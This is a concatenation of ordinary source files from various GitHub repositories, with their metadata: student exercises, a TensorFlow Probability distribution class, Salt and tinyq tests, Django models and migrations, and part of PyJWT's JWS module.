0fbf2d8f2f31b5556b486c568da417a2ac0933a1 | 4b379051aa3430eb2d8931f6055772731dcb199d | /512-Python_основы_и_применение/24471/stepik-512_24471-step7.py | 8ead90784919d275251ba0e63a734f6a778ab201 | [] | no_license | dmikos/stepikCourse | 1416614ef51a4352374f37e86e3211c3b42cbaf6 | 3faeabfdc56cac597fb6b1495e7bb38a7f2a6816 | refs/heads/master | 2021-01-12T17:06:37.720050 | 2016-11-21T14:37:20 | 2016-11-21T14:37:20 | 69,057,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import requests
import re
from urllib.parse import urlparse
# link = input()
link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7.html"
# link = "http://pastebin.com/raw/2mie4QYa"
#test3
# link = "http://pastebin.com/raw/7543p0ns"
# link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7-test3.html"
pattern = re.compile(r"href *= *[',\"].+[',\"]")
res = pattern.findall(requests.get(link).text)
finset = set()
for line in res:
line = re.split(r"[',\"]", str(line))[1]
if line.startswith("../"):
continue
elif urlparse(line).scheme == '':
# finset.add((urlparse(line).path).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).path)
finset.add(urlparse(line).path)
elif urlparse(line).scheme:
finset.add((urlparse(line).netloc).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).netloc)
# print(sorted(finset))
for stroke in sorted(finset):
print(stroke)
"""
Output
mail.ru
neerc.ifmo.ru
stepic.org
www.ya.ru
ya.ru
""" | [
"dkostinov@gmail.com"
] | dkostinov@gmail.com |
67aa0ecaa841b2950f17b83d5e2e87f4235094b3 | 0a1e4f7105aba084054eaf32e2000efaa564a3cd | /Chap 7/viet_hoa_ten.py | b59b4001c9bd0093bfc5f8ef44fe983fb78fbcb8 | [] | no_license | tucpy/basic_python | b322cf4def209b165a4cd84994f13c41d14d3ec7 | 28adf05c1ef3f81dbcc034daea370d5e5b7b6ad6 | refs/heads/master | 2020-03-29T01:13:52.067014 | 2018-10-27T01:31:15 | 2018-10-27T01:31:15 | 149,378,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py |
chuoi = str(input("Nhap ho va ten: "))
list_tu = chuoi.split()
print(list_tu)
chuoi_xu_ly =""
for tu in list_tu:
tu_xu_ly = tu.capitalize()
chuoi_xu_ly += tu_xu_ly +" "
print(chuoi_xu_ly) | [
"phtu05@gmail.com"
] | phtu05@gmail.com |
310e7dc1e96517addbe6292968c00ff9d8f7b730 | 0b25dc3f9b4ef736e739aadddec33b96dd65a0c8 | /测试/data_time.py | 90ddb7902f29abef8a0087c5857877da14ba8b25 | [] | no_license | ttp55/LearnPy | b123f44a74e4364771491c572705742c15eb33ff | 1530e158bde152e5c585f496dd1e5ffcffdb73bc | refs/heads/master | 2023-05-11T13:02:30.157285 | 2023-05-08T07:13:57 | 2023-05-08T07:13:57 | 196,953,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | # @time: 2019/8/12 15:49
# @author: WZG
# encoding: utf-8
import datetime
d = datetime.datetime.now()
print(d.hour) | [
"1047697347@qq.com"
] | 1047697347@qq.com |
5b7439666b70413e97fe6747a21e163c2f742c3b | 62e9fb33329fbefa89287e5bc343cb9c120306a1 | /tensorflow_probability/python/distributions/generalized_pareto.py | 8bf088dc807a7e15c4528a51130642d4c7d02d93 | [
"Apache-2.0"
] | permissive | npfp/probability | 3c103d4b9d7a72d3d16eb79b1e4f648afbaca057 | 3911f4463cdcca6cc118633742430885fb0c88cb | refs/heads/master | 2022-05-01T14:23:40.504258 | 2022-04-07T20:08:45 | 2022-04-07T20:10:58 | 246,853,846 | 0 | 0 | Apache-2.0 | 2020-03-12T14:23:04 | 2020-03-12T14:23:03 | null | UTF-8 | Python | false | false | 13,489 | py | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Generalized Pareto distribution."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import math as tfp_math
from tensorflow_probability.python.bijectors import generalized_pareto as generalized_pareto_bijector
from tensorflow_probability.python.bijectors import softplus as softplus_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
class GeneralizedPareto(distribution.AutoCompositeTensorDistribution):
"""The Generalized Pareto distribution.
The Generalized Pareto distributions are a family of continuous distributions
on the reals. Special cases include `Exponential` (when `loc = 0`,
`concentration = 0`), `Pareto` (when `concentration > 0`,
`loc = scale / concentration`), and `Uniform` (when `concentration = -1`).
This distribution is often used to model the tails of other distributions.
As a member of the location-scale family,
`X ~ GeneralizedPareto(loc=loc, scale=scale, concentration=conc)` maps to
`Y ~ GeneralizedPareto(loc=0, scale=1, concentration=conc)` via
`Y = (X - loc) / scale`.
For positive concentrations, the distribution is equivalent to a hierarchical
Exponential-Gamma model with `X|rate ~ Exponential(rate)` and
`rate ~ Gamma(concentration=1 / concentration, scale=scale / concentration)`.
In the following, `samp1` and `samps2` are identically distributed:
```python
genp = tfd.GeneralizedPareto(loc=0, scale=scale, concentration=conc)
samps1 = genp.sample(1000)
jd = tfd.JointDistributionNamed(dict(
rate=tfd.Gamma(1 / genp.concentration, genp.scale / genp.concentration),
x=lambda rate: tfd.Exponential(rate)))
samps2 = jd.sample(1000)['x']
```
The support of the distribution is always lower bounded by `loc`. When
`concentration < 0`, the support is also upper bounded by
`loc + scale / abs(concentration)`.
#### Mathematical Details
The probability density function (pdf) is,
```none
pdf(x; mu, sigma, shp, x > mu) =
(1 + shp * (x - mu) / sigma)**(-1 / shp - 1) / sigma
```
where:
* `concentration = shp`, any real value,
* `scale = sigma`, `sigma > 0`,
* `loc = mu`.
The cumulative density function (cdf) is,
```none
cdf(x; mu, sigma, shp, x > mu) = 1 - (1 + shp * (x - mu) / sigma)**(-1 / shp)
```
Distribution parameters are automatically broadcast in all functions; see
examples for details.
Samples of this distribution are reparameterized (pathwise differentiable).
#### Examples
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
dist = tfd.GeneralizedPareto(loc=1., scale=2., concentration=0.03)
dist2 = tfd.GeneralizedPareto(loc=-2., scale=[3., 4.],
concentration=[[-.4], [0.2]])
```
Compute the gradients of samples w.r.t. the parameters:
```python
loc = tf.Variable(3.0)
scale = tf.Variable(2.0)
conc = tf.Variable(0.1)
dist = tfd.GeneralizedPareto(loc, scale, conc)
with tf.GradientTape() as tape:
samples = dist.sample(5) # Shape [5]
loss = tf.reduce_mean(tf.square(samples)) # Arbitrary loss function
# Unbiased stochastic gradients of the loss function
grads = tape.gradient(loss, dist.variables)
```
"""
def __init__(self,
loc,
scale,
concentration,
validate_args=False,
allow_nan_stats=True,
name=None):
"""Construct a Generalized Pareto distribution.
Args:
loc: The location / shift of the distribution. GeneralizedPareto is a
location-scale distribution. This parameter lower bounds the
distribution's support. Must broadcast with `scale`, `concentration`.
Floating point `Tensor`.
scale: The scale of the distribution. GeneralizedPareto is a
location-scale distribution, so doubling the `scale` doubles a sample
and halves the density. Strictly positive floating point `Tensor`. Must
broadcast with `loc`, `concentration`.
concentration: The shape parameter of the distribution. The larger the
magnitude, the more the distribution concentrates near `loc` (for
`concentration >= 0`) or near `loc - (scale/concentration)` (for
`concentration < 0`). Floating point `Tensor`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, variance) use the value "`NaN`" to indicate the result is
undefined. When `False`, an exception is raised if one or more of the
statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
TypeError: if `loc`, `scale`, or `concentration` have different dtypes.
"""
parameters = dict(locals())
with tf.name_scope(name or 'GeneralizedPareto') as name:
dtype = dtype_util.common_dtype([loc, scale, concentration],
dtype_hint=tf.float32)
self._loc = tensor_util.convert_nonref_to_tensor(
loc, dtype=dtype, name='loc')
self._scale = tensor_util.convert_nonref_to_tensor(
scale, dtype=dtype, name='scale')
self._concentration = tensor_util.convert_nonref_to_tensor(
concentration, dtype=dtype, name='concentration')
super(GeneralizedPareto, self).__init__(
dtype=dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=reparameterization.FULLY_REPARAMETERIZED,
parameters=parameters,
name=name)
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
# pylint: disable=g-long-lambda
return dict(
loc=parameter_properties.ParameterProperties(),
scale=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=(
lambda: softplus_bijector.Softplus(low=dtype_util.eps(dtype)))),
concentration=parameter_properties.ParameterProperties())
# pylint: enable=g-long-lambda
@property
def loc(self):
return self._loc
@property
def scale(self):
return self._scale
@property
def concentration(self):
return self._concentration
def _event_shape(self):
return []
def _sample_n(self, n, seed=None):
# Inversion samples via inverse CDF.
loc = tf.convert_to_tensor(self.loc)
scale = tf.convert_to_tensor(self.scale)
concentration = tf.convert_to_tensor(self.concentration)
# Pre-broadcast to ensure we draw enough randomness.
sample_shp = ps.concat(
[[n],
self._batch_shape_tensor(
loc=loc, scale=scale, concentration=concentration)],
axis=0)
logu = tf.math.log1p(
-samplers.uniform(sample_shp, dtype=self.dtype, seed=seed))
eq_zero = tf.equal(concentration, 0)
safe_conc = tf.where(eq_zero, tf.constant(1, dtype=self.dtype),
concentration)
where_nonzero = loc + scale / safe_conc * tf.math.expm1(-safe_conc * logu)
where_zero = loc - scale * logu
return tf.where(eq_zero, where_zero, where_nonzero)
def _log_prob(self, x):
scale = tf.convert_to_tensor(self.scale)
concentration = tf.convert_to_tensor(self.concentration)
z = self._z(x, scale)
eq_zero = tf.equal(concentration, 0) # Concentration = 0 ==> Exponential.
nonzero_conc = tf.where(eq_zero, tf.constant(1, self.dtype), concentration)
y = 1 / nonzero_conc + tf.ones_like(z, self.dtype)
where_nonzero = tf.where(
tf.equal(y, 0), y, y * tf.math.log1p(nonzero_conc * z))
return -tf.math.log(scale) - tf.where(eq_zero, z, where_nonzero)
def _log_survival_function(self, x):
scale = tf.convert_to_tensor(self.scale)
concentration = tf.convert_to_tensor(self.concentration)
z = self._z(x, scale)
eq_zero = tf.equal(concentration, 0) # Concentration = 0 ==> Exponential.
nonzero_conc = tf.where(eq_zero, tf.constant(1, self.dtype), concentration)
where_nonzero = -tf.math.log1p(nonzero_conc * z) / nonzero_conc
return tf.where(eq_zero, -z, where_nonzero)
def _log_cdf(self, x):
# Going through the survival function is more accurate when conc is near
# zero, because it amounts to computing the (1 + conc * z)**(-1 / conc)
# term in log-space with log1p.
# tfp_math.log1mexp(a) accurately computes log(1 - exp(-|a|)). The negation
# and the absolute value are fine here because the log survival function is
# always non-positive.
return tfp_math.log1mexp(self._log_survival_function(x))
def _z(self, x, scale):
loc = tf.convert_to_tensor(self.loc)
return (x - loc) / scale
def _mean(self):
concentration = tf.convert_to_tensor(self.concentration)
lim = tf.ones([], dtype=self.dtype)
valid = concentration < lim
safe_conc = tf.where(valid, concentration, tf.constant(.5, self.dtype))
result = lambda: self.loc + self.scale / (1 - safe_conc)
if self.allow_nan_stats:
return tf.where(valid, result(), tf.constant(float('nan'), self.dtype))
with tf.control_dependencies([
assert_util.assert_less(
concentration,
lim,
message='`mean` is undefined when `concentration >= 1`')
]):
return result()
def _variance(self):
concentration = tf.convert_to_tensor(self.concentration)
lim = tf.constant(.5, self.dtype)
valid = concentration < lim
safe_conc = tf.where(valid, concentration, tf.constant(.25, self.dtype))
def result():
answer = self.scale**2 / ((1 - safe_conc)**2 * (1 - 2 * safe_conc))
# Force broadcasting with self.loc to get the shape right, even though the
# variance doesn't depend on the location.
return answer + tf.zeros_like(self.loc)
if self.allow_nan_stats:
return tf.where(valid, result(), tf.constant(float('nan'), self.dtype))
with tf.control_dependencies([
assert_util.assert_less(
concentration,
lim,
message='`variance` is undefined when `concentration >= 0.5`')
]):
return result()
def _entropy(self):
ans = tf.math.log(self.scale) + self.concentration + 1
return tf.broadcast_to(ans, self._batch_shape_tensor())
# TODO(b/145620027): Finalize choice of bijector.
def _default_event_space_bijector(self):
return generalized_pareto_bijector.GeneralizedPareto(
self.loc,
scale=self.scale,
concentration=self.concentration,
validate_args=self.validate_args)
def _parameter_control_dependencies(self, is_init):
if not self.validate_args:
return []
assertions = []
if is_init != tensor_util.is_ref(self.scale):
assertions.append(
assert_util.assert_positive(
self.scale, message='Argument `scale` must be positive.'))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
if not self.validate_args:
return assertions
loc = tf.convert_to_tensor(self.loc)
scale = tf.convert_to_tensor(self.scale)
concentration = tf.convert_to_tensor(self.concentration)
assertions.append(assert_util.assert_greater_equal(
x, loc, message='Sample must be greater than or equal to `loc`.'))
assertions.append(assert_util.assert_equal(
tf.logical_or(tf.greater_equal(concentration, 0),
tf.less_equal(x, loc - scale / concentration)),
True,
message=('If `concentration < 0`, sample must be less than or '
'equal to `loc - scale / concentration`.'),
summarize=100))
return assertions
def _quantile(self, p):
k = tf.convert_to_tensor(self.concentration)
m = tf.convert_to_tensor(self.loc)
s = tf.convert_to_tensor(self.scale)
is_k_zero = tf.equal(k, 0)
# Use double where trick to ensure gradient correctness.
safe_k = tf.where(is_k_zero, tf.ones([], k.dtype), k)
neglog1mp = -tf.math.log1p(-p)
return m + s * tf.where(is_k_zero,
neglog1mp,
tf.math.expm1(k * neglog1mp) / safe_k)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
630141755dcdf5e0317aa3414d0bb6b99e0586e3 | 12b34dcd389dec2095ef454d9dc89976ff7c7215 | /code/one_max_multiprocessing.py | 402d190d1a000a9391c9f19e047fb9994c41ae2f | [] | no_license | mariosky/PPSN2014 | ce0d64a3f61b36b467acab33297481a7e590dcf0 | a2ce8971951e2af311146d74cb043e68ff90cc67 | refs/heads/master | 2020-05-30T12:03:01.086997 | 2014-11-23T17:01:41 | 2014-11-23T17:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | __author__ = 'mariosky'
from multiprocessing import Pool
import one_max
import time, yaml
config = yaml.load(open("conf/conf.yaml"))
experiment = "w%d-%d-p%d" % (config["NUMBER_OF_WORKERS"],config["SAMPLE_SIZE"],config["POPULATION_SIZE"])
experiment_id = experiment + "-%d" % round(time.time(),0)
datafile = open("data/one_max-"+experiment_id+".dat","a")
conf_out = open("conf/one_max-"+experiment_id+".yaml","w")
yaml.dump(config, conf_out)
conf_out.close()
for i in range(30):
print '############################'
print '############################'
start = time.time()
one_max.initialize(config)
tInitialize = time.time()-start
print i, tInitialize
p = Pool(config["NUMBER_OF_WORKERS"])
params = [(w, config) for w in range(config["NUMBER_OF_WORKERS"])]
start = time.time()
results = p.map(one_max.work, params)
#print results
tTotal = time.time()-start
totals = "%d,%0.2f,%0.2f" % (i, round(tTotal,2), round(tInitialize,2))
print totals
datafile.write(totals + '\n')
for worker_list in results:
for data_list in worker_list:
datafile.write(str(i) +"," + ",".join(map(str,data_list)) + '\n')
| [
"mariosky@gmail.com"
] | mariosky@gmail.com |
614d791a27c148a546020e8be0519f9e59df2dd7 | 23f5ef8f31ff54f7166c98f76c00c6fef0dd9caa | /tests/pytests/unit/test_beacons.py | 27940c6f65e5d151e712147a056ff67a91c4cbd1 | [
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] | permissive | afischer-opentext-com/salt | 42bfe2e6e1a86bf8dd30b5a6db4d8e575ac9ca99 | b011a4ed6b29e3d2e8242e5909721dcda75d14df | refs/heads/master | 2022-10-25T00:01:07.138687 | 2021-09-27T16:24:02 | 2021-09-27T16:46:43 | 407,080,050 | 0 | 0 | Apache-2.0 | 2021-09-16T08:12:53 | 2021-09-16T08:12:52 | null | UTF-8 | Python | false | false | 2,476 | py | """
unit tests for the beacon_module parameter
"""
import logging
import salt.config
from tests.support.mock import MagicMock, call, patch
log = logging.getLogger(__name__)
def test_beacon_process():
"""
Test the process function in the beacon class
returns the correct information when an exception
occurs
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
]
}
beacon_mock = MagicMock(side_effect=Exception("Global Thermonuclear War"))
beacon_mock.__globals__ = {}
beacon = salt.beacons.Beacon(mock_opts, [])
found = "ps.beacon" in beacon.beacons
beacon.beacons["ps.beacon"] = beacon_mock
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"error": "Global Thermonuclear War",
"data": {},
"beacon_name": "ps",
}
]
assert ret == _expected
def test_beacon_module():
"""
Test that beacon_module parameter for beacon configuration
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
]
}
beacon = salt.beacons.Beacon(mock_opts, [])
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"data": {"id": "minion", "apache2": "Stopped"},
"beacon_name": "ps",
}
]
assert ret == _expected
# Ensure that "beacon_name" is available in the call to the beacon function
name = "ps.beacon"
mocked = {name: MagicMock(return_value=_expected)}
mocked[name].__globals__ = {}
calls = [
call(
[
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
{"_beacon_name": "watch_apache"},
]
)
]
with patch.object(beacon, "beacons", mocked) as patched:
beacon.process(mock_opts["beacons"], mock_opts["grains"])
patched[name].assert_has_calls(calls)
| [
"mwilhite@vmware.com"
] | mwilhite@vmware.com |
d3cf863162bbc543d350c11218e6b2157ca672c3 | 23759c9e64e6ce82f4d7472b1f9c027b2d34bdad | /01 - News App(Unfinished)/webapp/main/migrations/0004_auto_20200809_0023.py | 50b59513ae34d90868220ea3c96f81de63aa7d3f | [] | no_license | TanimSk/Django-Archive | 77ce5912da5108ff5fd7d95d4e66d1961a3a5bb9 | 69710877df284a85f7b66e9ddb14b8bbb3c90eef | refs/heads/master | 2023-01-29T15:08:41.478146 | 2020-12-05T09:14:41 | 2020-12-05T09:14:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | # Generated by Django 3.1 on 2020-08-08 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20200807_1810'),
]
operations = [
migrations.AddField(
model_name='main_start',
name='facebook',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='github',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='youtube',
field=models.TextField(default='-'),
),
]
| [
"61817579+baseplate-admin@users.noreply.github.com"
] | 61817579+baseplate-admin@users.noreply.github.com |
9ea3047f9eafa6f106e1402425b14554e09a4be8 | 962fb0927fd2dc998f17a59809b0a508bb043ec0 | /tests/test_app.py | 0351d91848f829e2d4c0cab03b15c6faffbc6b66 | [
"MIT"
] | permissive | mozillazg/tinyq | 9653680c20e00cf973df68cd1c7224a5d8380dcf | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | refs/heads/master | 2023-08-23T21:18:37.207385 | 2017-06-19T14:03:06 | 2017-06-19T14:03:06 | 72,210,812 | 14 | 2 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
def test_app_delay(app):
@app.task()
def count(x, y):
return x + y
count.delay(1, 2)
assert len(app.schedule_queue.connection.keys('*')) == 1
assert app.schedule_queue.dequeue()
def test_app_call(app):
@app.task()
def count(x, y):
return x + y
assert count(1, 2) == 3
assert len(app.schedule_queue.connection.keys('*')) == 0
| [
"mozillazg101@gmail.com"
] | mozillazg101@gmail.com |
67569ed3a331217728b35b752ffc10ee42b26f69 | 7394e662a54b5df7307dc0f7a0a7d4ef4d1c045f | /event/models.py | 582a91fee88950db874c607e4109f7b03de98e24 | [] | no_license | Aman563/spectrum-server | a16660c043d7c98a80cf94296e9535cab50e9297 | f41cc13735f1e3a79f22be380bb9ed55489bed03 | refs/heads/master | 2020-04-21T20:58:33.367627 | 2018-01-23T14:34:24 | 2018-01-23T14:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
from register.models import UserData
class EventData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
round_name = models.CharField(max_length=120, blank=True, null=True)
# rules = models.CharField(max_length=800, blank=True, null=True)
image = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_blur = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_landscape = models.ImageField(upload_to='event/', default="/media/event/default.png")
time = models.CharField(max_length=120, blank=True, null=True)
date = models.CharField(max_length=255, blank=True, null=True)
type = models.IntegerField(default=1, blank=True, null=True)
location = models.CharField(max_length=120, blank=True, null=True)
day = models.IntegerField(default=0, blank=True, null=True)
attendees = models.IntegerField(default=0, blank=True, null=True)
# description = models.CharField(max_length=800, blank=True, null=True)
prize_description = models.CharField(max_length=120, blank=True, null=True)
round = models.IntegerField(default=1, blank=True, null=True)
facebook_url = models.CharField(max_length=255, blank=True, null=True)
rules = models.TextField(max_length=1000, null=True, blank=True, default="")
description = models.TextField(max_length=1000, null=True, blank=True, default="")
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
class UserEventData(models.Model):
user = models.ForeignKey(UserData, null=True)
event = models.ForeignKey(EventData, null=True)
participated = models.IntegerField(default=0, blank=True, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.user.name
class OrganiserData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
mobile = models.CharField(max_length=120, blank=True, null=True)
event = models.ForeignKey(EventData, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
ddfc0ba313bcc76af69e40d2021eb67ef443f3b8 | f3f616801184633a40d767c7f71b3e375fd166d1 | /hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/test.py | d1209cc7da862a3d413d6c58a2469cbd1232519c | [
"MIT"
] | permissive | amarish-kumar/coding-challenges | cf0668114929c4cccd92944c1b8cb9c6e029ab9d | d5f998c738058d06a0217fb54f9f03a646384bce | refs/heads/master | 2020-03-21T10:26:08.919197 | 2017-05-20T13:58:50 | 2017-05-20T13:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | from unittest import TestCase, main as ut_main
import solution as sol
class TestSolution(TestCase):
def test_detect_disjoint_graph(self):
n = 3
edges = [[1, 2], [2, 3]]
graph, nodes = self.make_graph_and_node_list(n, edges)
self.assertEqual(self.start1(sol.detect_disjoint_graph(nodes, graph, n)), [1, 2, 3])
def make_graph_and_node_list(self, n, edges):
graph = sol.make_graph_from_edges(n, edges)
nodes = map(lambda i : i, range(0, n))
return graph, nodes
def start1(self, nodes):
return map(lambda i : i + 1, nodes)
def test_get_all_disjoint_graphs(self):
def test(n, edges, result):
graph, _ = self.make_graph_and_node_list(n, edges)
graphs = map(self.start1, sol.get_all_disjoint_graphs(graph, n))
self.assertEqual(graphs, result)
test(3, [[1, 2]], [[1, 2], [3]])
test(3, [[1, 2], [2, 3]], [[1, 2, 3]])
test(5, [[1, 2], [2, 3]], [[1, 2, 3], [4], [5]])
test(5, [[1, 2], [2, 3], [4, 5]], [[1, 2, 3], [4, 5]])
test(5, [], map(lambda i : [i], range(1, 6)))
if __name__ == '__main__':
ut_main()
| [
"babaiscool@gmail.com"
] | babaiscool@gmail.com |
523cecdfdf690e90f4c33ca6a4f3482ee0066c0b | 6d4c5e79bb36785d5bb127e263aac50cb6729a88 | /venv/Lib/site-packages/jwt/api_jws.py | 5accb1b50077b0d06551fb01ff2c4efebc8b14cc | [] | no_license | Galymbekov/BackWebDevProject | a7683fc205d467629f4ad132370ff4b5ac535277 | 3343fd277bc8994bec3d484072a8ed5f1d99b6bb | refs/heads/main | 2023-04-14T14:06:13.888793 | 2021-04-30T12:12:37 | 2021-04-30T12:12:37 | 362,004,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,095 | py | import binascii
import json
import warnings
try:
# import required by mypy to perform type checking, not used for normal execution
from typing import Callable, Dict, List, Optional, Union # NOQA
except ImportError:
pass
from .algorithms import (
Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA
)
from .compat import Mapping, binary_type, string_types, text_type
from .exceptions import (
DecodeError, InvalidAlgorithmError, InvalidSignatureError,
InvalidTokenError
)
from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict
class PyJWS(object):
header_typ = 'JWT'
def __init__(self, algorithms=None, options=None):
self._algorithms = get_default_algorithms()
self._valid_algs = (set(algorithms) if algorithms is not None
else set(self._algorithms))
# Remove algorithms that aren't on the whitelist
for key in list(self._algorithms.keys()):
if key not in self._valid_algs:
del self._algorithms[key]
if not options:
options = {}
self.options = merge_dict(self._get_default_options(), options)
@staticmethod
def _get_default_options():
return {
'verify_signature': True
}
def register_algorithm(self, alg_id, alg_obj):
"""
Registers a new Algorithm for use when creating and verifying tokens.
"""
if alg_id in self._algorithms:
raise ValueError('Algorithm already has a handler.')
if not isinstance(alg_obj, Algorithm):
raise TypeError('Object is not of type `Algorithm`')
self._algorithms[alg_id] = alg_obj
self._valid_algs.add(alg_id)
def unregister_algorithm(self, alg_id):
"""
Unregisters an Algorithm for use when creating and verifying tokens
Throws KeyError if algorithm is not registered.
"""
if alg_id not in self._algorithms:
raise KeyError('The specified algorithm could not be removed'
' because it is not registered.')
del self._algorithms[alg_id]
self._valid_algs.remove(alg_id)
def get_algorithms(self):
"""
Returns a list of supported values for the 'alg' parameter.
"""
return list(self._valid_algs)
def encode(self,
payload, # type: Union[Dict, bytes]
key, # type: str
algorithm='HS256', # type: str
headers=None, # type: Optional[Dict]
json_encoder=None # type: Optional[Callable]
):
segments = []
if algorithm is None:
algorithm = 'none'
if algorithm not in self._valid_algs:
pass
# Header
header = {'typ': self.header_typ, 'alg': algorithm}
if headers:
self._validate_headers(headers)
header.update(headers)
json_header = force_bytes(
json.dumps(
header,
separators=(',', ':'),
cls=json_encoder
)
)
segments.append(base64url_encode(json_header))
segments.append(base64url_encode(payload))
# Segments
signing_input = b'.'.join(segments)
try:
alg_obj = self._algorithms[algorithm]
key = alg_obj.prepare_key(key)
signature = alg_obj.sign(signing_input, key)
except KeyError:
if not has_crypto and algorithm in requires_cryptography:
raise NotImplementedError(
"Algorithm '%s' could not be found. Do you have cryptography "
"installed?" % algorithm
)
else:
raise NotImplementedError('Algorithm not supported')
segments.append(base64url_encode(signature))
return b'.'.join(segments)
def decode(self,
jwt, # type: str
key='', # type: str
verify=True, # type: bool
algorithms=None, # type: List[str]
options=None, # type: Dict
**kwargs):
merged_options = merge_dict(self.options, options)
verify_signature = merged_options['verify_signature']
if verify_signature and not algorithms:
warnings.warn(
'It is strongly recommended that you pass in a ' +
'value for the "algorithms" argument when calling decode(). ' +
'This argument will be mandatory in a future version.',
DeprecationWarning
)
payload, signing_input, header, signature = self._load(jwt)
if not verify:
warnings.warn('The verify parameter is deprecated. '
'Please use verify_signature in options instead.',
DeprecationWarning, stacklevel=2)
elif verify_signature:
self._verify_signature(payload, signing_input, header, signature,
key, algorithms)
return payload
def get_unverified_header(self, jwt):
"""Returns shop the JWT header parameters as a dict()
Note: The signature is not verified so the header parameters
should not be fully trusted until signature verification is complete
"""
headers = self._load(jwt)[2]
self._validate_headers(headers)
return headers
def _load(self, jwt):
if isinstance(jwt, text_type):
jwt = jwt.encode('utf-8')
if not issubclass(type(jwt), binary_type):
raise DecodeError("Invalid token type. Token must be a {0}".format(
binary_type))
try:
signing_input, crypto_segment = jwt.rsplit(b'.', 1)
header_segment, payload_segment = signing_input.split(b'.', 1)
except ValueError:
raise DecodeError('Not enough segments')
try:
header_data = base64url_decode(header_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid header padding')
try:
header = json.loads(header_data.decode('utf-8'))
except ValueError as e:
raise DecodeError('Invalid header string: %s' % e)
if not isinstance(header, Mapping):
raise DecodeError('Invalid header string: must be a json object')
try:
payload = base64url_decode(payload_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid payload padding')
try:
signature = base64url_decode(crypto_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid crypto padding')
return (payload, signing_input, header, signature)
def _verify_signature(self, payload, signing_input, header, signature,
key='', algorithms=None):
alg = header.get('alg')
if algorithms is not None and alg not in algorithms:
raise InvalidAlgorithmError('The specified alg value is not allowed')
try:
alg_obj = self._algorithms[alg]
key = alg_obj.prepare_key(key)
if not alg_obj.verify(signing_input, key, signature):
raise InvalidSignatureError('Signature verification failed')
except KeyError:
raise InvalidAlgorithmError('Algorithm not supported')
def _validate_headers(self, headers):
